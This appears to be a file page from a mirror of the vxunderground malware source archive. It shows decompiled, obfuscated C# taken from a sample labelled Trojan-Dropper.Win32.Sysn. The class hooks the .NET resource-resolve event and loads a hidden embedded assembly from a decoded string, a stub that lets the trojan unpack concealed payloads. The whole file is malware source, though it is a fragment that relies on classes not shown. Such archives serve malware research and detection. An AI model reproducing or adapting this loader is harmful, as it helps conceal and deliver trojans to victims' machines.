mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
51 lines
1.4 KiB
C#
51 lines
1.4 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
||
|
||
using \u0001;
|
||
using System;
|
||
using System.Reflection;
|
||
using System.Runtime.InteropServices;
|
||
|
||
namespace \u0001
|
||
{
|
||
internal sealed class \u0006
|
||
{
|
||
private static Assembly \u0001 = (Assembly) null;
|
||
private static string[] \u0001 = new string[0];
|
||
|
||
internal static void \u000F()
|
||
{
|
||
try
|
||
{
|
||
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0006.\u000F);
|
||
}
|
||
catch (Exception ex)
|
||
{
|
||
}
|
||
}
|
||
|
||
internal static Assembly \u000F([In] object obj0, [In] ResolveEventArgs obj1)
|
||
{
|
||
if ((object) \u0006.\u0001 == null)
|
||
{
|
||
lock (\u0006.\u0001)
|
||
{
|
||
\u0006.\u0001 = Assembly.Load(\u0004.\u000F(192));
|
||
if ((object) \u0006.\u0001 != null)
|
||
\u0006.\u0001 = \u0006.\u0001.GetManifestResourceNames();
|
||
}
|
||
}
|
||
string name = obj1.Name;
|
||
for (int index = 0; index < \u0006.\u0001.Length; ++index)
|
||
{
|
||
if (\u0006.\u0001[index] == name)
|
||
return \u0006.\u0001;
|
||
}
|
||
return (Assembly) null;
|
||
}
|
||
}
|
||
}
|